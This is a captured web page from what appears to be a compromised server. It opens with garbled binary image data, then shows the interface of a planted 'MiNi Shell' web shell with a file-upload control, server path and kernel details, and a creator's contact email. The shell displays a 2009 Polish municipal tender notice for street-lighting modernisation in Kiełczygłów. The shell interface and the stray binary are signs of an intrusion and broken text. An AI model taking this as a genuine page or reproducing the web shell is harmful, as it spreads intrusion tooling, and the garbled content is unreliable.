JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091015/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091015/178699-N-2009.html

<p class="kh_header"><b>Kiełczygłów: Modernizacja oświetlenia drogowego na terenie Gminy Kiełczygłów</b><br>
<b>Numer ogłoszenia: 178699 - 2009; data zamieszczenia: 15.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kiełczygłów , ul. Tysiąclecia 25, 98-358 Kiełczygłów, woj. łódzkie, tel. 0-43 8425022 w.35, 8425078, faks 0-43 8425022 w.21.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.kielczyglow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja oświetlenia drogowego na terenie Gminy Kiełczygłów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest  modernizacja oświetlenia ulicznego na terenie Gminy Kiełczygłów  zgodnie z przedmiarem robót, dokumentacją projektową, programami funkcjonalno - użytkowymi oraz specyfikacją techniczną wykonania i odbioru robót. 
2. Zakres rzeczowy przedmiotu zamówienia obejmuje :
          a) wymianę 495 szt. istniejących opraw oświetleniowych na nowe o mocy : 
              -   70 W - 330 szt.; 
              -  100 W - 165 szt.;
              Demontaż 145 szt. opraw istniejących, oraz wykonanie pozostałych robót, zgodnie z przedmiarem robót.
          b) Dokonanie uzgodnień przed realizacją modernizacji dotyczących :
      - robót energetycznych z właściwym Zakładem Energetycznym ( koszty wyłączeń ponosi Wykonawca );
      - zajęcie pasa drogowego z właścicielem drogi (koszty zajęcia pasa drogowego ponosi Wykonawca).
 c) Wykonanie robót demontażowych :
     - zdemontowane źródła światła Wykonawca przekaże do utylizacji wyspecjalizowanemu podmiotowi na swój koszt; protokół z utylizacji Wykonawca przekaże Zamawiającemu;
     - zdemontowane pozostałe materiały nie podlegające utylizacji wykonawca przekaże Właścicielowi;
d) Wykonanie oznakowania drogowego zmiany organizacji ruchu na czas wykonywania
     robót.
e) Wykonanie inwentaryzacji opraw oświetleniowych po realizacji robót modernizacyjnych  z podziałem na obwody oświetlenia ulicznego i numeracją słupów, na których zostały zainstalowane oprawy ( schematy jednokreskowe ).
f) Odbiór wykonanych robót modernizacyjnych pod względem technicznym przez właściwy terenowo Zakład Energetyczny.
g) Przywrócenie terenu do stanu pierwotnego po zakończeniu robót.
h) Wykonanie wszelkich prac pomocniczych i towarzyszących niezbędnych do realizacji przedmiotu zamówienia.
i) Konserwacja systemu oświetlenia obejmująca utrzymanie sprawności oświetlenia 
     w czasie 3 miesięcy od daty podpisania protokołu odbioru, a w szczególności :
    - wymianę uszkodzonych źródeł światła z materiałami,
    - wymianę uszkodzonych opraw z materiałami,
    - wymianę zabezpieczeń opraw z materiałami,
    - pozostałe czynności konserwacyjne obejmujące utrzymanie sprawności oświetlenia ulicznego.
    Czas przystąpienia do usunięcia usterki systemu oświetlenia ulicznego wykonanego w ramach modernizacji oświetlenia,  zgłoszonej telefonicznie lub fax-em przez Zamawiającego :
    - awarie całych ciągów  -  48 h,
    - pojedyncze awarie  -  5 dni.
3. Minimalne wymagane parametry techniczne dla opraw i źródeł światła zastosowanych do modernizacji oświetlenia ulicznego na terenie Gminy Kiełczygłów :
          a) Parametry użytkowe :
- korpus (obudowa) oprawy musi być wykonany z odlewu aluminium w wersji jedno lub dwu komorowej;
- klosz ochraniający źródło światła musi być wykonany z materiału odpornego na 
   uderzenia - współczynnik IK - 08 lub wyższy; 
- Odbłyśnik oprawy musi być wykonany z aluminium  jako jednoczęściowy. 
- oprawy oświetlenia ulicznego muszą posiadać  regulację rozsyłu układu optycznego 
poprzez regulację źródła światła względem odbłyśnika , lub odbłyśnika względem  źródła światła dające możliwość regulacji w co najmniej 4 oznaczonych pozycjach ; 
- klosz po otwarciu oprawy celem dokonania konserwacji musi pozostawać podwieszony do korpusu a otwarcie musi następować od strony czołowej oprawy tj. podwieszenie do korpusu od strony wysięgnika, dopuszcza się również oprawy które do celów konserwacji otwierają się do góry
- klips zamykający klosz wykonany ze stali nierdzewnej,
- oprawy oświetlenia drogowego musza być wyposażone w system mikrowentylacji zapewniający oddychanie oprawy.
- średnia trwałość źródeł światła opraw ulicznych powinna być na poziomie minimum 18.000 godzin świecenia;
- zastosować w oprawach źródła światła o strumieniu świetlnym, tzn.:                                                                                                                                
      źródło    70 W - co najmniej    6.600 Lm, źródło  100 W - co najmniej  10.500 Lm, źródło  150 W - co najmniej  17.500 Lm,    
Źródła światła wszystkich zastosowanych mocy muszą być tego samego producenta
  b) Parametry techniczne :
- stopień szczelności dla opraw dwukomorowych min. IP 66 dla komory optycznej i min. IP 66 dla komory osprzętu, a dla opraw jednokomorowych min. IP 66 dla całej oprawy oświetlenia ulicznego;
- oprawy oświetlenia ulicznego muszą być wykonane i dostarczone w II klasie 
 ochrony w zakresie ochrony przeciw porażeniowej;
- oprawy oświetlenia ulicznego muszą być przystosowane do zasilania napięciem 
230 V, 50 Hz;.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.31.61.10-9, 45.31.12.00-2, 45.31.23.11-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości   20.000,- zł  (słownie :  dwadzieścia tysięcy złotych).
        
Wadium należy wnieść w terminie składania ofert , w formie dopuszczonej ustawą Prawo zamówień publicznych (art. 45 ust. 6) w formie pieniądza :  
- przelewem na konto : Banku Spółdzielczym w Ruścu o/Kiełczygłów nr 57 9264 0009 0010 0003 2000 0030
- w innych formach dopuszczonych ustawą  ( poręczenia bankowe lub poręczenia 
spółdzielczej kasy oszczędnościowo-kredytowej; gwarancje bankowe; gwarancje ubezpieczeniowe; poręczenia, o których mowa w art. 45 ust. 6 pkt 5 Prawa zamówień publicznych ) - należy złożyć w kasie Zamawiającego.
         W/w poręczenia i gwarancje muszą być bezwarunkowe i płatne na pierwsze żądanie Zamawiającego zgodne z przesłankami utraty wadium określonymi w art. 46 ust. 5 Prawa zamówień publicznych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Warunki udziału w postępowaniu :
   1) Wykonawca musi być dopuszczony do występowania w obrocie prawnym 
       w zakresie objętym zamówieniem.
   2) Wykonawca musi posiadać niezbędną wiedzę i doświadczenie oraz musi 
       dysponować potencjałem technicznym i osobami zdolnymi do wykonania 
       zamówienia, w szczególności :
       a) musi przedstawić wykaz wykonanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót odpowiadających swoim rodzajem robotom stanowiącym przedmiot zamówienia, wymagane jest wykazanie się co najmniej jedną robotą tożsamą z przedmiotem zamówienia o wartości nie mniejszej niż 300 000,- zł. Za roboty tożsame uważa się: modernizację lub modernizacja oświetlenia ulicznego;
       b) musi dysponować osobą posiadającą uprawnienia budowlane w branży 
elektrycznej, a także należącą do właściwego samorządu zawodowego, której zamierza powierzyć funkcję kierownika robót;
  3) Wykonawca nie podlega wykluczeniu z postępowania o udzielenie zamówienia
      na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych.
  4) Wykonawca spełnia warunki określone przepisami art. 22 ust 1 ustawy Prawo zamówień publicznych.
2. Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu :
    Zamawiający oceni spełnianie warunków udziału w postępowaniu na podstawie 
    dokumentów załączonych do oferty. Wykonawca musi wykazać spełnianie każdego 
    z warunków. Niespełnienie któregokolwiek warunku spowoduje wykluczenie 
    wykonawcy z postępowania i uznanie jego oferty za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Warunków udziału w postępowaniu : 
    1) Dowód wniesienia wadium.
    2) Oświadczenie, że wykonawca spełnia wymogi określone w art. 22 ust. 1 oraz,   
        że nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy z 29   
        stycznia 2004r. Prawo zamówień publicznych  ( Dz.U. Nr 19, poz. 177 z późn. 
        zm. ).
    3) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do 
        ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do 
        rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie 
        wcześniej  niż 6 miesięcy przed upływem terminu składania ofert.  
    4) wykaz wykonanych w okresie ostatnich pięciu lat przed dniem wszczęcia 
        postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności 
        jest krótszy - w tym okresie, robót odpowiadających swoim rodzajem robotom 
        stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i 
        miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty 
        te zostały wykonane należycie.
    5) W przypadku realizacji zamówienia z udziałem podwykonawstwa, wykonawca 
        musi wskazać w ofercie część zamówienia, której wykonanie zamierza 
        powierzyć podwykonawcom, a także podać nazwy (firmy) proponowanych 
        podwykonawców.    
    6) Aktualną informacje z Krajowego Rejestru Karnego albo równoważnego 
        zaświadczenia właściwego organu sądowego lub administracyjnego kraju 
        pochodzenia osoby w zakresie określonym w art. 24 ust 1 pkt. 4-8 ustawy 
        Prawo zamówień publicznych , wystawionej nie wcześniej niż 6 miesięcy przed 
        upływem terminu składania ofert. 
    7) Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym 
        w art. 24 ust. 1 pkt 9 ustawy Prawo zamówień publicznych, wystawionej nie 
        wcześniej niż 6 miesięcy przed upływem terminu składania ofert  
    8) decyzję o stwierdzeniu przygotowania zawodowego do pełnienia samodzielnych 
        funkcji technicznych w budownictwie oraz uprawnienia SEP elektryków i 
        uprawnienia SEP dla kierownika budowy. Należy dołączyć dokument 
        potwierdzający wpis na listę członków Polskiej Izby Inżynierów Budownictwa 
        dla osoby posiadającej prawo wykonywania samodzielnych funkcji 
        technicznych w budownictwie  zgodnie z ustawą z dn. 15.12.2000r. o 
        samorządach  zawodowych architektów, inżynierów  budownictwa oraz 
        urbanistów (Dz. U. z  2001 r Nr 5 poz. 42 z późn. zmianami)
    9) Aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz    
        właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego 
        Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie 
        zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenia zdrowotne 
        i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, 
        odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości 
        wykonania decyzji właściwego organu - wystawionych  nie wcześniej niż 3 
        miesiące przed upływem terminu ofert 
   10) Kosztorys ofertowy zgodny z przedmiarem robót
   11) karty katalogowe i deklaracje CE dla proponowanych opraw i źródeł światła 
        według zapisów punktu 3 i 4 par 3.
3.  Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium 
     Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 1 p.pkt 2
     - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, Wskazany dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
             
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o których mowa, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.kielczyglow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kiełczygłów
ul. Tysiąclecia 25
98-358 Kiełczygłów
pokój nr 13.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.11.2009 godzina 11:00, miejsce: Urząd Gminy Kiełczygłów
ul. Tysiąclecia 25
98-358 Kiełczygłów
pokój Nr 12 - Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com